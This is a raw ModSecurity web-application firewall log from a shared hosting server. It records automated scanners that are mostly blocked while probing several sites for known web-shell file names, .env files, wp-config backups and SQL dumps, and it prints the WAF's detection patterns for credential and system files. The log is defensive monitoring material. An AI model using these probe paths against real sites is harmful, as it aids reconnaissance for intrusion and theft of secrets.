[Tue May 26 15:27:46.721912 2026] [security2:error] [pid 715645:tid 715865] [client 185.192.71.181:24231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/inputs.php"] [unique_id "ahVumnVGgMGh8k213RjyEwAAAFo"]
[Tue May 26 15:27:47.414096 2026] [security2:error] [pid 715645:tid 715880] [client 185.92.25.53:54029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/mini.php"] [unique_id "ahVum3VGgMGh8k213RjyIwAAAGk"]
[Tue May 26 15:27:47.834633 2026] [security2:error] [pid 715645:tid 715834] [client 185.92.25.62:34421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/goods.php"] [unique_id "ahVum3VGgMGh8k213RjyMQAAADs"]
[Tue May 26 15:27:49.392497 2026] [security2:error] [pid 715645:tid 715828] [client 185.92.25.54:40631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 54.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/file5.php"] [unique_id "ahVunXVGgMGh8k213RjyXAAAADU"]
[Tue May 26 15:27:49.398332 2026] [security2:error] [pid 715645:tid 715881] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVunHVGgMGh8k213RjyVAAAAGo"]
[Tue May 26 15:27:50.075742 2026] [security2:error] [pid 715645:tid 715679] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.99.159.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.com"] [uri "/cp.php"] [unique_id "ahVunnVGgMGh8k213RjycgAAHSE"]
[Tue May 26 15:27:50.084056 2026] [security2:error] [pid 715645:tid 715714] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env"] [unique_id "ahVunnVGgMGh8k213RjyhgAAL0Q"]
[Tue May 26 15:27:50.085905 2026] [security2:error] [pid 715645:tid 715707] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env.backup"] [unique_id "ahVunnVGgMGh8k213RjyiwAALz0"]
[Tue May 26 15:27:50.092775 2026] [security2:error] [pid 715645:tid 715703] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/db.sql"] [unique_id "ahVunnVGgMGh8k213RjyoQAALzk"]
[Tue May 26 15:27:50.094227 2026] [security2:error] [pid 715645:tid 715714] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/backup.bak"] [unique_id "ahVunnVGgMGh8k213RjyogAAL0Q"]
[Tue May 26 15:27:50.094769 2026] [security2:error] [pid 715645:tid 715713] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/backup.sql"] [unique_id "ahVunnVGgMGh8k213RjyoAAAL0M"]
[Tue May 26 15:27:50.095633 2026] [security2:error] [pid 715645:tid 715714] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/dump.sql"] [unique_id "ahVunnVGgMGh8k213RjyowAAL0Q"]
[Tue May 26 15:27:50.096201 2026] [security2:error] [pid 715645:tid 715771] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/database.sql"] [unique_id "ahVunnVGgMGh8k213RjypAAAL30"]
[Tue May 26 15:27:50.326799 2026] [security2:error] [pid 715645:tid 715705] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.99.159.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.com"] [uri "/wp-login.php"] [unique_id "ahVunnVGgMGh8k213RjylgAALzs"]
[Tue May 26 15:27:50.876389 2026] [security2:error] [pid 715645:tid 715867] [client 185.192.71.168:52301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/ahax.php"] [unique_id "ahVunnVGgMGh8k213RjyxAAAAFw"]
[Tue May 26 15:27:50.989978 2026] [security2:error] [pid 715645:tid 715743] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.99.159.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.com"] [uri "/wp-config.php"] [unique_id "ahVunnVGgMGh8k213Rjy0wAAFWE"]
[Tue May 26 15:27:50.990188 2026] [security2:error] [pid 715645:tid 715753] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.99.159.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.com"] [uri "/configuration.php"] [unique_id "ahVunnVGgMGh8k213Rjy1AAAFWs"]
[Tue May 26 15:27:50.992331 2026] [security2:error] [pid 715645:tid 715655] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.99.159.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.com"] [uri "/adminer.php"] [unique_id "ahVunnVGgMGh8k213Rjy3AAAFQk"]
[Tue May 26 15:27:50.995599 2026] [security2:error] [pid 715645:tid 715656] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "corporatecargosolutions.com"] [uri "/wp-config.php.bak"] [unique_id "ahVunnVGgMGh8k213Rjy4QAAFQo"]
[Tue May 26 15:27:50.996700 2026] [security2:error] [pid 715645:tid 715760] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/config.bak"] [unique_id "ahVunnVGgMGh8k213Rjy4AAAFXI"]
[Tue May 26 15:27:50.998001 2026] [security2:error] [pid 715645:tid 715749] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.99.159.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.com"] [uri "/loader.php"] [unique_id "ahVunnVGgMGh8k213Rjy7wAAFWc"]
[Tue May 26 15:27:50.998679 2026] [security2:error] [pid 715645:tid 715747] [remote 192.159.99.103:53214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "corporatecargosolutions.com"] [uri "/.env.bak"] [unique_id "ahVunnVGgMGh8k213Rjy5AAAFWU"]
[Tue May 26 15:27:51.312058 2026] [security2:error] [pid 715645:tid 715826] [client 185.92.25.130:62925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 130.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/f35.php"] [unique_id "ahVun3VGgMGh8k213Rjy9wAAADM"]
[Tue May 26 15:27:51.466599 2026] [security2:error] [pid 715645:tid 715801] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVun3VGgMGh8k213Rjy8gAAABo"]
[Tue May 26 15:27:51.756367 2026] [security2:error] [pid 715645:tid 715834] [client 185.192.71.175:41221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/simple.php"] [unique_id "ahVun3VGgMGh8k213RjzAQAAADs"]
[Tue May 26 15:27:52.320976 2026] [security2:error] [pid 715645:tid 715813] [client 91.230.225.121:29285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 121.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/amax.php"] [unique_id "ahVuoHVGgMGh8k213RjzCQAAACY"]
[Tue May 26 15:27:53.815388 2026] [security2:error] [pid 715645:tid 715804] [client 185.192.71.169:49961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/update/f35.php"] [unique_id "ahVuoXVGgMGh8k213RjzOwAAAB0"]
[Tue May 26 15:27:54.024727 2026] [security2:error] [pid 715645:tid 715861] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuoXVGgMGh8k213RjzNwAAAFY"]
[Tue May 26 15:27:54.289826 2026] [security2:error] [pid 715645:tid 715877] [client 91.230.225.131:24653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/hello.php"] [unique_id "ahVuonVGgMGh8k213RjzRgAAAGY"]
[Tue May 26 15:27:54.784052 2026] [security2:error] [pid 715645:tid 715867] [client 185.192.71.171:29729] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-admin/maint/bootstrap.php"] [unique_id "ahVuonVGgMGh8k213RjzUAAAAFw"]
[Tue May 26 15:27:55.299817 2026] [security2:error] [pid 715645:tid 715897] [client 91.230.225.115:61659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/themes/zMousse/otuz1.php"] [unique_id "ahVuo3VGgMGh8k213RjzWgAAAHo"]
[Tue May 26 15:27:55.613580 2026] [security2:error] [pid 715645:tid 715811] [client 185.92.25.52:55587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 52.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/edit-wolf.php"] [unique_id "ahVuo3VGgMGh8k213RjzYQAAACQ"]
[Tue May 26 15:27:56.137336 2026] [security2:error] [pid 715645:tid 715797] [client 185.192.71.172:58209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/ubh/up.php"] [unique_id "ahVupHVGgMGh8k213RjzfQAAABY"]
[Tue May 26 15:27:56.268919 2026] [security2:error] [pid 715645:tid 715823] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuo3VGgMGh8k213RjzcwAAADA"]
[Tue May 26 15:27:56.330584 2026] [security2:error] [pid 715645:tid 715846] [client 173.239.240.51:26425] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVupHVGgMGh8k213RjzeAAAAEc"]
[Tue May 26 15:27:56.330784 2026] [security2:error] [pid 715645:tid 715846] [client 173.239.240.51:26425] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "406"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVupHVGgMGh8k213RjzeAAAAEc"]
[Tue May 26 15:27:56.649035 2026] [security2:error] [pid 715645:tid 715802] [client 185.192.71.185:47763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 185.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-admin/images/bootstrap.php"] [unique_id "ahVupHVGgMGh8k213RjziwAAABs"]
[Tue May 26 15:27:57.283540 2026] [security2:error] [pid 715645:tid 715839] [client 14.234.16.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVupHVGgMGh8k213RjzlQAAAEA"]
[Tue May 26 15:27:58.262981 2026] [security2:error] [pid 715645:tid 715878] [client 91.230.225.119:36635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/images/upload.php"] [unique_id "ahVupnVGgMGh8k213RjzsAAAAGc"]
[Tue May 26 15:27:58.671708 2026] [security2:error] [pid 715645:tid 715880] [client 173.239.240.54:50221] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVupHVGgMGh8k213RjzdgAAAGk"]
[Tue May 26 15:27:58.771905 2026] [security2:error] [pid 715645:tid 715840] [client 91.230.225.118:53619] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/seoplugins/db.php"] [unique_id "ahVupnVGgMGh8k213RjzwAAAAEE"]
[Tue May 26 15:27:58.772082 2026] [security2:error] [pid 715645:tid 715902] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVupnVGgMGh8k213RjzuQAAAH8"]
[Tue May 26 15:27:59.194975 2026] [security2:error] [pid 715645:tid 715788] [client 185.192.71.167:30309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/themes/pridmag/db.php"] [unique_id "ahVup3VGgMGh8k213RjzzwAAAA0"]
[Tue May 26 15:27:59.773948 2026] [security2:error] [pid 715645:tid 715777] [client 91.230.225.132:21475] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 132.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/linkpreview/db.php"] [unique_id "ahVup3VGgMGh8k213Rjz3AAAAAI"]
[Tue May 26 15:28:00.216834 2026] [security2:error] [pid 715645:tid 715682] [remote 54.36.102.244:42168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVuqHVGgMGh8k213Rjz6gAAGiQ"]
[Tue May 26 15:28:00.538789 2026] [security2:error] [pid 715645:tid 715838] [client 167.160.75.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuqHVGgMGh8k213Rjz-QAAAD8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:28:00.664321 2026] [security2:error] [pid 715645:tid 715881] [client 173.239.240.36:20587] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVupHVGgMGh8k213RjzdQAAAGo"]
[Tue May 26 15:28:01.098228 2026] [security2:error] [pid 715645:tid 715877] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuqHVGgMGh8k213Rjz_wAAAGY"]
[Tue May 26 15:28:01.274389 2026] [security2:error] [pid 715645:tid 715836] [client 91.230.225.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuqHVGgMGh8k213Rjz8AAAAD0"]
[Tue May 26 15:28:02.282804 2026] [security2:error] [pid 715645:tid 715848] [client 91.230.225.115:48387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/modules/mod_simplefileuploadv1.3/elements/udd.php"] [unique_id "ahVuqnVGgMGh8k213Rj0JAAAAEk"]
[Tue May 26 15:28:02.642262 2026] [security2:error] [pid 715645:tid 715876] [client 185.192.71.175:54311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/pwnd/pwnd.php"] [unique_id "ahVuqnVGgMGh8k213Rj0MAAAAGU"]
[Tue May 26 15:28:03.160976 2026] [security2:error] [pid 715645:tid 715830] [client 167.160.75.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVuq3VGgMGh8k213Rj0PgAAADc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285213&moderation-hash=f7a8e26165aa61daf462c6336a022179
[Tue May 26 15:28:03.236082 2026] [security2:error] [pid 715645:tid 715865] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuqnVGgMGh8k213Rj0NQAAAFo"]
[Tue May 26 15:28:04.124096 2026] [security2:error] [pid 715645:tid 715870] [client 185.92.25.61:38381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-content/plugins/pwnd-1/pwnd.php"] [unique_id "ahVurHVGgMGh8k213Rj0VgAAAF8"]
[Tue May 26 15:28:04.773298 2026] [security2:error] [pid 715645:tid 715894] [client 185.192.71.183:61789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 183.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-admin/css/colors/midnight/admin.php"] [unique_id "ahVurHVGgMGh8k213Rj0agAAAHc"]
[Tue May 26 15:28:05.313318 2026] [security2:error] [pid 715645:tid 715846] [client 91.230.225.120:27425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/kill.php"] [unique_id "ahVurXVGgMGh8k213Rj0fQAAAEc"]
[Tue May 26 15:28:06.013816 2026] [security2:error] [pid 715645:tid 715822] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVurXVGgMGh8k213Rj0iAAAAC8"]
[Tue May 26 15:28:06.370835 2026] [security2:error] [pid 715645:tid 715735] [remote 5.78.119.122:45180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVurnVGgMGh8k213Rj0mAAAMlk"]
[Tue May 26 15:28:06.947826 2026] [security2:error] [pid 715645:tid 715861] [client 185.92.25.50:21321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-includes/style-engine/worksec.php"] [unique_id "ahVurnVGgMGh8k213Rj0rgAAAFY"]
